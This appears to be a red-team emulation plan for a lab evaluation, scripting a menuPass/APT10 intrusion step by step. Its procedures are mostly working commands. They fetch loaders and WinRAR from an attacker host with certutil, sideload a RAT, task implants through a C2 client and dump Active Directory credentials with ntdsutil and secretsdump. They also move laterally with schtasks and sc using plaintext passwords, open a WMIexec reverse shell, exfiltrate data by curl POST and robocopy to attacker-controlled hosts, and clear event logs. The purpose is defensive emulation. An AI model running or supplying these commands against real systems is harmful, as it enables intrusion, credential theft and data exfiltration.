#
menuPass Scenario Overview
#
Step 0 - Operator Setup
#
☣️ Procedures
Initiate an RDP session to the Windows jumpbox
homelander (116.83.1.29)
Search for Command Prompt and right-click Run As Administrator. Execute the following command to start the Quasar C2 server:
C:\menu_pass\Resources\Quasar\bin\Release\net472\Quasar.exe -c C:\menu_pass\Resources\Quasar\quasar.p12
➡️ Initiate an RDP session to the Kali attack host
kraken (176.59.1.18)
In a new terminal window, start the evalsC2server, ensuring the following handlers are enabled:
- QuasarRAT
- SodaMaster
- Simple file server
cd menu_pass/Resources/control_server sudo go build -o controlServer main.go sudo ./controlServer -c config/msr2_handler_config.yml
Right-click within the terminal window and click "Split Terminal Horizontally". Within the new terminal, change directory to the location of the evalsC2client.py and use this terminal for tasking implants.
cd menu_pass/Resources/control_server
#
Step 1 - Establish Persistence
#
🎤 Voice Track
menuPass gains initial access via stolen credentials with local administrative
privileges. These credentials allow the adversary to access the Microsoft
Internet Information Services (IIS) web server gabumon (10.10.10.9)
in
Subsidiary A’s environment via RDP.
After establishing access on the IIS server gabumon (10.10.10.9)
, menuPass
downloads Sigloader, its components, and the encrypted QuasarRAT module on the
victim device using certutil
. SigLoader is a multi-layer loader that loads
and decrypts the target payload. Eventually, SigLoader will load the first
payload, FYAnti, in memory.
FYAnti decrypts the first embedded .NET module and executes the module using
the CppHostCLR
technique to avoid dropping additional files to disk. When
executed, the first embedded .NET module then enumerates files to find the
QuasarRAT .NET module on disk, decrypts it, and then executes it.
QuasarRAT, which has been modified and heavily obfuscated, checks first for
internet connectivity then connects to the C2 server using a redirector at
notepad-plusplus-updates[.]com (121.93.4.32)
.
#
☣️ Procedures
From the Windows jumpbox
homelander (116.83.1.29)
, using the provided stolen system credentials, RDP to the IIS Servergabumon (10.10.10.9)
.Open Command Prompt with administrative privileges
Execute
certutil
to download SigLoader and FYAnti components.certutil.exe -urlcache -f http://ten-cent.us/files/VERSION.dll "C:\Program Files\Notepad++\VERSION.dll" certutil.exe -urlcache -f http://ten-cent.us/files/skt.dll %SYSTEMROOT%\System32\skt.dll certutil.exe -urlcache -f http://ten-cent.us/files/mshtml.wpf.wfx %SYSTEMROOT%\Microsoft.NET\mshtml.wpf.wfx certutil.exe -urlcache -f http://ten-cent.us/files/ngen.old2.log %SYSTEMROOT%\Microsoft.NET\Framework64\v4.0.30319\ngen.old2.log
- Note:
VERSION.dll
is a symbolic link to menu_pass/Resources/payloads/sigloader/IIS_layer1.dllskt.dll
is a symbolic link to menu_pass/Resources/payloads/sigloader/IIS_layer2.dllmshtml.wpf.wfx
is a symbolic link to menu_pass/Resources/payloads/sigloader/IIS_fyanti.dllngen.old2.log
is a symbolic link to menu_pass/Resources/payloads/sigloader/Client.exe.enc
- Note:
Execute NotePad++.exe to perform DLL sideloading. SigLoader will load FYAnti and FYAnti will load QuasarRAT.
"C:\Program Files\Notepad++\notepad++.exe"
- NOTE: the current working directory should be
C:\Windows\System32
. This is where the Quasarclientmanagement.log
will be dropped.
- NOTE: the current working directory should be
Confirm C2 registration of QuasarRAT
Minimize Notepad++ and close out of all other windows, then disconnect from the RDP session (do not sign out)
#
🔍 Reference Code & Reporting
- https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/
- http://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf
- https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf
- https://media.kasperskydaily.com/wp-content/uploads/sites/86/2021/02/25140359/greatidea_A41_v1.0.pdf
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage
- https://www.trendmicro.com/ja_jp/research/21/l/Sigloader-by-Earth-Tengshe.html
- https://www.lac.co.jp/lacwatch/report/20201201_002363.html
:link: Click to expand source code links table
ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps
#
Step 2 - Initial Discovery
#
🎤 Voice Track
After establishing communications with the C2 server, menuPass will use QuasarRAT to execute scripted discovery actions and discover the presence of a domain controller on Subsidiary A’s network.
#
☣️ Procedures
Using QuasarRAT, download the PowerShell discovery script to the IIS Server
./evalsC2client.py --set-task F5B06FACBDB06686ABA3E958BE433EF5 '{"type": 2, "transfer_src": "C:\\menu_pass\\Resources\\payloads\\quasar\\step2discovery.ps1", "transfer_dst": "C:\\Users\\kizumi\\AppData\\Local\\Temp\\ekR9TmrCQa1Q.ps1"}'
Using QuasarRAT, execute the PowerShell discovery script
./evalsC2client.py --set-task F5B06FACBDB06686ABA3E958BE433EF5 '{"type": 1, "proc_path":"powershell.exe", "proc_args": "\"C:\\Users\\kizumi\\AppData\\Local\\Temp\\ekR9TmrCQa1Q.ps1\""}'
#
🔍 Reference Code & Reporting
- https://blogs.blackberry.com/en/2019/06/threat-spotlight-menupass-quasarrat-backdoor
- https://medium.com/cycraft/supply-chain-attack-targeting-taiwan-financial-sector-bae2f0962934
- https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/
- https://media.kasperskydaily.com/wp-content/uploads/sites/86/2021/02/25140359/greatidea_A41_v1.0.pdf
- https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf
- https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-
- https://web.archive.org/web/20191028183408/https://blog.ensilo.com/uncovering-new-activity-by-apt10
:link: Click to expand source code links table
ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps
#
Step 3 - Credential Access and Privilege Escalation
#
🎤 Voice Track
Eventually, the IIS Server admin logs in to the IIS Server gabumon (10.10.10.9)
.
While performing tasks, they eventually need to type in their Domain Admin
credentials. Using QuasarRAT's keylogger utility, menuPass captures the domain
admin credentials.
menuPass initiates a new RDP to the IIS server gabumon (10.10.10.9)
using
the compromised credentials from Step 1.
Using the RDP to the IIS Server gabumon (10.10.10.9)
, menuPass opens
PowerShell with administrative privileges and authenticates using the domain
admin's credentials.
#
☣️ Procedures
⏩ Emulate the following legitimate user activity:
➡️ initiate an RDP session from the jumpbox
homelander (176.59.17.22)
togabumon (10.10.10.9)
as the IIS Admin:Open Command Prompt with administrative privileges, execute cmd via
runas
with their Domain Admin username, typing the password when prompted:runas /user:DIGIRUNAWAY\kizumi.da cmd
Type, DO NOT copy and paste, the following when prompted:
ydJEeqNzN4Xqkd9h@
Close the Command Prompts then disconnect from the RDP when finished. You should return to
homelander (116.83.1.29)
⏩ Resume red team activity
Using the first QuasarRAT on the IIS server
gabumon (10.10.10.9)
, retrieve keylogs:./evalsC2client.py --set-task F5B06FACBDB06686ABA3E958BE433EF5 '{"type": 4}'
Initiate a new RDP to the IIS server
gabumon (10.10.10.9)
using the stolen credentials from Step 1.Within the RDP to the IIS server
gabumon (10.10.10.9)
, open Command Prompt with administrative privileges (if not already open) then execute the following runas command, entering the kizumi.da password when prompted:runas /netonly /user:DIGIRUNAWAY\kizumi.da cmd.exe
#
🔍 Reference Code & Reporting
- https://blogs.blackberry.com/en/2019/06/threat-spotlight-menupass-quasarrat-backdoor
- https://medium.com/cycraft/supply-chain-attack-targeting-taiwan-financial-sector-bae2f0962934
- https://web.archive.org/web/20191028183408/https://blog.ensilo.com/uncovering-new-activity-by-apt10
- https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/
- https://media.kasperskydaily.com/wp-content/uploads/sites/86/2021/02/25140359/greatidea_A41_v1.0.pdf
- https://www.trendmicro.com/ja_jp/research/21/l/Sigloader-by-Earth-Tengshe.html
- https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf
- https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-
:link: Click to expand source code links table
ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps
#
Step 4 - Lateral Movement to Subsidiary A Domain Controller
#
🎤 Voice Track
Using the first QuasarRAT implant, menuPass downloads a second copy of
SigLoader/QuasarRAT to the IIS Server gabumon (10.10.10.9)
then uses the
elevated Command Prompt to move the executable to the Subsidiary A Domain
Controller parrotmon (10.10.10.4)
.
Using the elevated Command Prompt, menuPass uses the schtasks
utility to
remotely create and run a scheduled task on the Subsidiary A Domain Controller
parrotmon (10.10.10.4)
that executes a legitimate executable:
Notepad++.exe
.
This legitimate executable executes SigLoader via DLL side-loading and results
in a second QuasarRAT implant on the Subsidiary A Domain Controller parrotmon (10.10.10.4)
.
This second QuasarRAT implant will connect to the C2 server using a redirector at notepad-plusplus-updates[.]eu (121.93.99.100)
.
#
☣️ Procedures
Using the QuasarRAT on the IIS Server
gabumon (10.10.10.9)
, download a second copy of SigLoader/QuasarRAT components. Wait until each command has returned before executing the next.SigLoader layer 1
./evalsC2client.py --set-task F5B06FACBDB06686ABA3E958BE433EF5 '{"type": 2, "transfer_src": "C:\\menu_pass\\Resources\\payloads\\quasar\\DC_layer1.dll", "transfer_dst": "C:\\Users\\kizumi\\AppData\\Local\\Temp\\VERSION.dll"}'
SigLoader layer 2
./evalsC2client.py --set-task F5B06FACBDB06686ABA3E958BE433EF5 '{"type": 2, "transfer_src": "C:\\menu_pass\\Resources\\payloads\\quasar\\DC_layer2.dll", "transfer_dst": "C:\\Users\\kizumi\\AppData\\Local\\Temp\\nhi.dll"}'
FYAnti
./evalsC2client.py --set-task F5B06FACBDB06686ABA3E958BE433EF5 '{"type": 2, "transfer_src": "C:\\menu_pass\\Resources\\payloads\\quasar\\DC_fyanti.dll", "transfer_dst": "C:\\Users\\kizumi\\AppData\\Local\\Temp\\mshtmled.wpf.cfg"}'
QuasarRAT
./evalsC2client.py --set-task F5B06FACBDB06686ABA3E958BE433EF5 '{"type": 2, "transfer_src": "C:\\menu_pass\\Resources\\payloads\\quasar\\Client.exe.enc", "transfer_dst": "C:\\Users\\kizumi\\AppData\\Local\\Temp\\ngen.old3.log"}'
Return to the elevated Command Prompt on the IIS server
gabumon (10.10.10.9)
and move the downloaded components to the Subsidiary A Domain Controller via SMB.move C:\Users\kizumi\AppData\Local\Temp\VERSION.dll "\\10.10.10.4\C$\Program Files\Notepad++\" move C:\Users\kizumi\AppData\Local\Temp\nhi.dll \\10.10.10.4\admin$\System32 move C:\Users\kizumi\AppData\Local\Temp\mshtmled.wpf.cfg \\10.10.10.4\admin$\Microsoft.NET move C:\Users\kizumi\AppData\Local\Temp\ngen.old3.log \\10.10.10.4\admin$\Microsoft.NET\Framework64\v4.0.30319\
Using the elevated Command Prompt on the IIS server
gabumon (10.10.10.9)
, remotely create a scheduled task on the Subsidiary A Domain Controllerparrotmon (10.10.10.4)
to execute a legitimate executable that sideloads SigLoader.schtasks /create /s 10.10.10.4 /u DIGIRUNAWAY\kizumi.da /p ydJEeqNzN4Xqkd9h@ /tn "Notepad++ Script" /tr "\"C:\Program Files\Notepad++\notepad++.exe\"" /ru DIGIRUNAWAY\kizumi.da /rp ydJEeqNzN4Xqkd9h@ /rl HIGHEST /sc MINUTE /mo 15 /f
Using the elevated Command Prompt on the IIS server
gabumon (10.10.10.9)
, remotely run the scheduled task created on the Subsidiary A Domain Controllerparrotmon (10.10.10.4)
.schtasks /run /s 10.10.10.4 /u DIGIRUNAWAY\kizumi.da /p ydJEeqNzN4Xqkd9h@ /tn "Notepad++ Script"
Confirm C2 registration of a second QuasarRAT implant.
#
🔍 Reference Code & Reporting
- http://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf
- https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf
- https://media.kasperskydaily.com/wp-content/uploads/sites/86/2021/02/25140359/greatidea_A41_v1.0.pdf
:link: Click to expand source code links table
ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps
#
Step 5 - Credential Access and Discovery
#
🎤 Voice Track
After gaining access on the Subsidiary A Domain Controller parrotmon (10.10.10.4)
,
menuPass uses the QuasarRAT implant on the Subsidiary A Domain Controller
parrotmon (10.10.10.4)
to execute the native ntdsutil.exe
utility to export
the Active Directory database to ntds.dit
. Then, menuPass uses QuasarRAT to
exfiltrate the generated ntds.dit
and SYSTEM
hive files then dumps
credentials offline to retrieve hashes of authenticated users. These hashes are
cracked offline to retrieve plaintext passwords for the domain users.
menuPass then performs an internal port scan to search for open RDP and SMB ports on the network. A reverse nslookup is then performed against the active IP addresses to resolve the hostnames.
#
☣️ Procedures
Using the QuasarRAT implant on the Subsidiary A Domain Controller
parrotmon (10.10.10.4)
, executewhoami
to get the user SID of kizumi.da./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 1, "proc_path":"whoami.exe", "proc_args": "/all"}'
Using the QuasarRAT implant on the Subsidiary A Domain Controller
parrotmon (10.10.10.4)
, create folder$RCXNYCG
in kizumi.da's Recycle Bin (C:\$Recycle.Bin\S-1-5-21-156812349-472333277-3174882868-1109\$RCXNYCG
)../evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 1, "proc_path":"cmd.exe", "proc_args": "/c mkdir C:\\$Recycle.Bin\\S-1-5-21-156812349-472333277-3174882868-1109\\$RCXNYCG"}'
Using the QuasarRAT implant on the Subsidiary A Domain Controller
parrotmon (10.10.10.4)
, executentdsutil.exe
to generatentds.dit
../evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 1, "proc_path":"ntdsutil.exe", "proc_args": "\"ac i ntds\" \"i\" \"c f C:\\$Recycle.Bin\\S-1-5-21-156812349-472333277-3174882868-1109\\$RCXNYCG\" q q"}'
Using the QuasarRAT implant on the Subsidiary A Domain Controller
parrotmon (10.10.10.4)
, exfiltrate the generatedntds.dit
file../evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 3, "transfer_src": "C:\\$Recycle.Bin\\S-1-5-21-156812349-472333277-3174882868-1109\\$RCXNYCG\\Active Directory\\ntds.dit", "transfer_dst": "ntds.dit"}'
Using the QuasarRAT implant on the Subsidiary A Domain Controller
parrotmon (10.10.10.4)
, exfiltrate the generatedSYSTEM
file./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 3, "transfer_src": "C:\\$Recycle.Bin\\S-1-5-21-156812349-472333277-3174882868-1109\\$RCXNYCG\\registry\\SYSTEM", "transfer_dst": "SYSTEM"}'
Using impacket, locally dump credentials to retrieve hashes of authenticated users, validate the NTLM hash of kizumi.da is contained in the output:
impacket-secretsdump -system files/SYSTEM -ntds files/ntds.dit local | grep 6265fbabbdaa3ee71df61bd9f3c77d68
Using the QuasarRAT implant on the Subsidiary A Domain Controller
parrotmon (10.10.10.4)
, port scan the workstations of the Subsidiary A network../evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 5, "range": "10.10.20.0/24", "ports":[22, 53, 80, 445, 3389], "timeout": 300}'
Using the QuasarRAT implant on the Subsidiary A Domain Controller
parrotmon (10.10.10.4)
, execute nslookup against the active hosts. Wait until each command has returned before executing the next.phantomon
./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 1, "proc_path":"nslookup.exe", "proc_args": "10.10.20.11"}'
ghostmon
./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 1, "proc_path":"nslookup.exe", "proc_args": "10.10.20.22"}'
cecilmon
./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 1, "proc_path":"nslookup.exe", "proc_args": "10.10.20.23"}'
#
🔍 Reference Code & Reporting
- http://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf
- https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf
- https://media.kasperskydaily.com/wp-content/uploads/sites/86/2021/02/25140359/greatidea_A41_v1.0.pdf
:link: Click to expand source code links table
ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps
#
Step 6 - Preparation for Lateral Movement onto Subsidiary B Network
#
🎤 Voice Track
menuPass performs additional Active Directory enumeration, through which the following are identified:
- A trusted domain DIGIREVENGE
- A bastion workstation
kimeramon (10.20.20.11)
in DIGIREVENGE allowing authentication for Subsidiary A users - Hosts and users within DIGIREVENGE
Using the QuasarRAT implant on the Subsidiary A Domain Controller
parrotmon (10.10.10.4)
, menuPass downloads SigLoader and its necessary
components to the Subsidiary A Domain Controller, then moves them to the
bastion workstation kimeramon (10.20.20.11)
.
Using the QuasarRAT implant on the Subsidiary A Domain Controller
parrotmon (10.10.10.4)
, menuPass then remotely creates a service on the
bastion workstation kimeramon (10.20.20.11)
to execute a legitimate binary
that will sideload SigLoader.
#
☣️ Procedures
Using the QuasarRAT implant on the Subsidiary A Domain Controller
parrotmon (10.10.10.4)
, executedsquery
to enumerate further information on the active hosts./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 1, "proc_path":"dsquery.exe", "proc_args": "* -filter \"(objectCategory=computer)\" -attr *"}'
Using the QuasarRAT implant on the Subsidiary A Domain Controller
parrotmon (10.10.10.4)
, executedsquery
to enumerate further information on trusted domains./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 1, "proc_path":"dsquery.exe", "proc_args": "* -filter \"(objectCategory=trusteddomain)\" -attr *"}'
- Ensure
DIGIREVENGE
is listed as a trusted domain
grep 'flatname: digirevenge' logs.txt -ia -C 10
- Ensure
Using the QuasarRAT implant on the Subsidiary A Domain Controller
parrotmon (10.10.10.4)
, executedsquery
to enumerate further information on the active hosts within DIGIREVENGE./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 1, "proc_path":"dsquery.exe", "proc_args": "* -filter \"(objectCategory=computer)\" -domain DIGIREVENGE -attr *"}'
- Ensure
kimeramon (10.20.20.11)
is listed in the output
grep 'Workstation Contractor Bastion' logs.txt -ia
- Ensure
Using the QuasarRAT implant on the Subsidiary A Domain Controller
parrotmon (10.10.10.4)
, executedsquery
to enumerate further information on the users within DIGIREVENGE./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 1, "proc_path":"dsquery.exe", "proc_args": "* -filter \"(&(objectclass=User)(objectCategory=Person))\" -domain DIGIREVENGE -attr *"}'
Using the QuasarRAT implant on the Subsidiary A Domain Controller
parrotmon (10.10.10.4)
, download SigLoader and its necessary components (SodaMaster version) and move them to the bastion workstationkimeramon (10.20.20.11)
. Wait until each command has returned before executing the next.SigLoader layer 1
./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 2, "transfer_src": "C:\\menu_pass\\Resources\\payloads\\quasar\\bastion_layer1.dll", "transfer_dst": "\\\\kimeramon.digirevenge.net\\C$\\Program Files\\Notepad++\\VERSION.dll"}'
SigLoader layer 2
./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 2, "transfer_src": "C:\\menu_pass\\Resources\\payloads\\quasar\\bastion_layer2.dll", "transfer_dst": "\\\\kimeramon.digirevenge.net\\admin$\\System32\\hkp.dll"}'
SodaMaster
./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 2, "transfer_src": "C:\\menu_pass\\Resources\\payloads\\quasar\\sodamaster.dll", "transfer_dst": "\\\\kimeramon.digirevenge.net\\admin$\\System32\\win64_tools.dll"}'
Using the QuasarRAT implant on the Subsidiary A Domain Controller
parrotmon (10.10.10.4)
, remotely create a service on the bastion workstationkimeramon (10.20.20.11)
to execute a legitimate binary that will sideload SigLoader./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"seq": 1, "type": 1, "proc_path": "sc.exe", "proc_args": "\\\\kimeramon.digirevenge.net create Notepad binpath= \"cmd /c \\\"C:\\Program Files\\Notepad++\\notepad++.exe\\\"\" error= ignore start= demand"}'
#
🔍 Reference Code & Reporting
- https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/
- http://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf
- https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf
- https://media.kasperskydaily.com/wp-content/uploads/sites/86/2021/02/25140359/greatidea_A41_v1.0.pdf
- https://www.trendmicro.com/ja_jp/research/21/l/Sigloader-by-Earth-Tengshe.html
- https://www.lac.co.jp/lacwatch/report/20201201_002363.html
- https://www.macnica.co.jp/business/security/manufacturers/files/mpressioncss_ta_report_2020_5_en.pdf
:link: Click to expand source code links table
ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps
#
Step 7 - Lateral Movement onto Subsidiary B Network
#
🎤 Voice Track
Using the QuasarRAT implant on the Subsidiary A Domain Controller
parrotmon (10.10.10.4)
, menuPass remotely executes the created service on the
bastion workstation kimeramon (10.20.20.11)
to execute a legitimate binary
that will sideload SigLoader.
On execution, SigLoader will again perform its layered loading, with the final loaded payload this time being SodaMaster. Once SodaMaster is executed, it will perform the following initialization steps:
- Perform automated host discovery
- Execute anti-sandbox checks
- Add itself to Windows Defender's whitelist
- Check Defender configurations
- Establish C2 communication using a redirector at
notepad-plusplus[.]eu (121.93.44.121)
Eventually, a file server administrator kmimi
from
Subsidiary B's network RDPs in to the bastion workstation kimeramon (10.20.20.11)
to perform tasks then disconnects from their session when complete.
#
☣️ Procedures
Using the QuasarRAT implant on the Domain Controller, remotely execute the created service
./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"seq": 1, "type": 1, "proc_path": "sc.exe", "proc_args": "\\\\kimeramon.digirevenge.net start Notepad"}'
- This command should return
FAILED 1053
. This is expected because notepad++.exe is not configured as a service binary that would properly respond to the service manager. However, notepad++.exe will still execute and should remain running even after the command returns the failed message.
- This command should return
Confirm C2 registration of SodaMaster
⏩ Emulate the following legitimate user activity:
➡️ initiate an RDP session from the jumpbox
homelander (176.59.17.22)
tokimeramon (10.20.20.11)
as the file server administrator:Open Command Prompt, mount the file share:
net use F: \\10.20.10.23\F$ /persistent:yes
Check the drive was mounted properly:
net use
Disconnect from RDP and you should return to
homelander (176.59.17.22)
⏩ Resume red team activity
#
🔍 Reference Code & Reporting
- https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/
- http://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf
- https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf
- https://media.kasperskydaily.com/wp-content/uploads/sites/86/2021/02/25140359/greatidea_A41_v1.0.pdf
- https://www.trendmicro.com/ja_jp/research/21/l/Sigloader-by-Earth-Tengshe.html
- https://www.lac.co.jp/lacwatch/report/20201201_002363.html
- https://www.macnica.co.jp/business/security/manufacturers/files/mpressioncss_ta_report_2020_5_en.pdf
:link: Click to expand source code links table
ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps
#
Step 8 - Discovery and Additional Privilege Escalation
#
🎤 Voice Track
menuPass uses SodaMaster to execute discovery actions, which will result in
menuPass discovering a file server alphamon (10.20.10.23)
and its
administrator kmimi
on Subsidiary B’s network. SodaMaster creates threads for
executing downloaded shellcode in memory.
To prepare to laterally move onto the file server, menuPass uses SodaMaster to
download secretsdump.exe
, which is Impacket's secretsdump.py
converted to
an executable binary using PyInstaller. SodaMaster executes secretsdump.exe
to dump the SYSTEM/SECURITY/SAM hives on the bastion workstation kimeramon (10.20.20.11)
,
authenticating using the NTLM hash for kizumi.da
collected
previously.
The retrieved dump contains a cached domain login for kmimi
, the file
server administrator in Subsidiary B which is cracked to reveal kmimi
's
plaintext password.
#
☣️ Procedures
Using SodaMaster, execute the discovery actions shellcode. Wait until each command has returned before executing the next.
netstat -anop tcp
./evalsC2client.py --set-task 2ef436e5400781c2f6611c31d4ef79b8 '{"id":"s", "args":"netstat -anop tcp"}'
- ❗ Verify a network connection to
alphamon (10.20.10.23)
port 445
- ❗ Verify a network connection to
tasklist /v
./evalsC2client.py --set-task 2ef436e5400781c2f6611c31d4ef79b8 '{"id":"s", "args":"tasklist /v"}'
- ❗ Verify that the enumerated processes output contains a process running under
kmimi
- ❗ Verify that the enumerated processes output contains a process running under
net view 10.20.10.23 /all
./evalsC2client.py --set-task 2ef436e5400781c2f6611c31d4ef79b8 '{"id":"s", "args":"net view 10.20.10.23 /all"}'
- ❗ Verify the output contains a list of file shares with the file server host
alphamon (10.20.10.23)
- ❗ Verify the output contains a list of file shares with the file server host
net user kmimi /domain
./evalsC2client.py --set-task 2ef436e5400781c2f6611c31d4ef79b8 '{"id":"s", "args":"net user kmimi /domain"}'
- ❗ Verify that
File Server Admins
is listed as one of the groups thatkmimi
is a member of
- ❗ Verify that
Using SodaMaster, download and execute
secretsdump.exe
, using the NTLM hash forkizumi.da
collected in step 5./evalsC2client.py --set-task 2ef436e5400781c2f6611c31d4ef79b8 '{"id":"s", "payload":"secretsdump.exe", "payloadPath":"C:/Windows/Temp", "args":"C:/Windows/Temp/secretsdump.exe digirunaway/kizumi.da@127.0.0.1 -hashes :6265fbabbdaa3ee71df61bd9f3c77d68 > C:/Windows/Temp/tmp4541 && echo Done"}'
Using SodaMaster, curl the secretsdump output to exfiltrate the file
./evalsC2client.py --set-task 2ef436e5400781c2f6611c31d4ef79b8 '{"id":"s", "args":"curl -X POST -H 'filename:sdump.txt' --data-binary @C:/Windows/Temp/tmp4541 http://ten-cent.us/uploads"}'
Confirm secretsdump output file was exfiltrated in the C2 server log then check for presence of a cached domain login for
kmimi
in the output:cat files/sdump.txt | grep -a kmimi
ℹ️ This hash is cracked to retrieve the plaintext password for
kmimi
#
🔍 Reference Code & Reporting
- https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/
- http://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf
- https://media.kasperskydaily.com/wp-content/uploads/sites/86/2021/02/25140359/greatidea_A41_v1.0.pdf
- https://www.trendmicro.com/ja_jp/research/21/l/Sigloader-by-Earth-Tengshe.html
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks
- https://cycraft.com/download/Smokescreen_Supply_Chain_Attack_Targets_Taiwan_Financial_Sector_A_Deeper_Look.pdf
:link: Click to expand source code links table
ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps
#
Step 9 - Data Collection & Exfiltration
#
🎤 Voice Track
menuPass uses SodaMaster to first download a modified WMIexec.vbs
to
C:\Users\kmimi\appdata\local\temp\w.vbs
on the bastion workstation kimeramon (10.20.20.11)
.
Then, menuPass executes w.vbs
with the cracked plaintext password of the file
server administrator kmimi
to connect to the file server alphamon (10.20.10.23)
.
menuPass uses the reverse shell on the file server alphamon (10.20.10.23)
to
execute several PowerShell commands to enumerate and identify files of
interest. menuPass then uses certutil to download WinRAR.exe to the file server
alphamon (10.20.10.23)
to C:\Program Files\conhost.exe
. Then, menuPass
executes WinRAR to compress files of interest. menuPass exfiltrates the
compressed files using RoboCopy to an adversary controlled SMB share.
Once exfiltration of files is complete, menuPass clears the Windows event logs on the file server and command history.
#
☣️ Procedures
➡️ Return to the RDP session on the Kali attack host
kraken (176.59.1.18)
Open a terminal window and start the SMB server:
sudo mkdir /opt/menu_pass/digirevenge sudo impacket-smbserver digirevenge /opt/menu_pass/digirevenge -smb2support
Using SodaMaster, download
WMIexec.vbs
to the bastion workstationkimeramon (10.20.20.11)
./evalsC2client.py --set-task 2ef436e5400781c2f6611c31d4ef79b8 '{"id":"s", "payload":"w.vbs", "payloadPath":"C:/Users/kmimi/appdata/local/temp/"}'
Initiate an RDP session to the bastion workstation
kimeramon (10.20.20.11)
using the file server administratorkmimi
credentials to authenticate.Using the RDP session, open a Command Prompt then execute
WMIexec.vbs
with the file server administratorkmimi
credentials targeting the file serveralphamon (10.20.10.23)
cscript.exe C:\Users\kmimi\appdata\local\temp\w.vbs /shell 10.20.10.23 DIGIREVENGE\kmimi cHjc3p3hJHJYPUzT@
Using the reverse shell to the file server, execute PowerShell file discovery commands
powershell.exe "Get-SmbShare | foreach-object -process { if($_.Path) { dir $_.Path } }" -wait4145
Using the reverse shell to the file server, execute
certutil.exe
to downloadWinRAR.exe
to the file server from the adversary servercertutil.exe -urlcache -f http://ten-cent.us/files/giag1.crl "C:\Program Files\conhost.exe"
Using the reverse shell to the file server, execute
WinRAR.exe
to compress each file path containing files of interestcd "C:\Program Files"
conhost.exe a -r C:\Windows\Temp\wmilog.rar F:\data
Using the reverse shell to the file server, mount an adversary controlled SMB share then execute the
RoboCopy
utility to exfiltrate the RAR to the adversary controlled SMB sharenet use \\manhwajia.au\digirevenge & robocopy C:\Windows\Temp \\manhwajia.au\digirevenge wmilog.rar /mt /z
➡️ Switch to an open terminal in Kali and confirm the exfiltration was successful
ls -l /opt/menu_pass/digirevenge
➡️ Return to the RDP with the reverse shell and, using the reverse shell to the file server, execute the
wevtutil
utility to clear Windows event logsfor /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" -wait4145
Exit the shell
exit
Close the Command Prompt then disconnect from the RDP session
#
🔍 Reference Code & Reporting
- https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/
- http://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf
- https://media.kasperskydaily.com/wp-content/uploads/sites/86/2021/02/25140359/greatidea_A41_v1.0.pdf
